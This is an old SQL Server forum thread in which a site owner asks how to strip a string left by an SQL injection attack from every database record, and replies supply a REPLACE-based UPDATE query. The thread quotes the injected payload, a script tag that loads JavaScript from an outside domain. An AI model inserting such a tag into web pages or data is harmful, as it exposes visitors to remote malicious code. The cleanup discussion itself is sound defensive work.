Please start any new threads on our new
site at https://forums.sqlteam.com. We've got lots of great SQL Server
experts to answer whatever question you can come up with.
| Author |
Topic |
|
cbadchris
Starting Member
2 Posts |
 Posted - 2009-05-28 : 09:58:15
|
| I inherrited a site that was hacked via SQL injection. The original data is still there but I need to write a query that removes only the hack content. Basically it just added "<script src=http://elfah.net/h.js></script>" to the end of every record. I am sure there is a query to get rid of this. |
|
|
madhivanan
Premature Yak Congratulator
22864 Posts |
Posted - 2009-05-28 : 10:31:12
|
| update your_tableset your_col=replace(your_col,'"<script src=http://elfah.net/h.js></script>"','')MadhivananFailing to plan is Planning to fail |
 |
|
|
cbadchris
Starting Member
2 Posts |
Posted - 2009-05-28 : 10:53:10
|
| That worked perfectly thanks. I knew about that replace from asp/vbscript but had not seen documentation anywhere on replace() in mssql. |
|
|
|
madhivanan
Premature Yak Congratulator
22864 Posts |
Posted - 2009-05-29 : 02:04:21
|
| You can read about REPLACE function in SQL Server help fileMadhivananFailing to plan is Planning to fail |
|
|
|
khtan
In (Som, Ni, Yak)
17689 Posts |
Posted - 2009-05-29 : 02:08:08
|
from BOLhttp://msdn.microsoft.com/en-us/library/ms186862(SQL.90).aspx
KH[spoiler]Time is always against us[/spoiler] |
|
|
|
|
|
|
Removing injected strings from fields.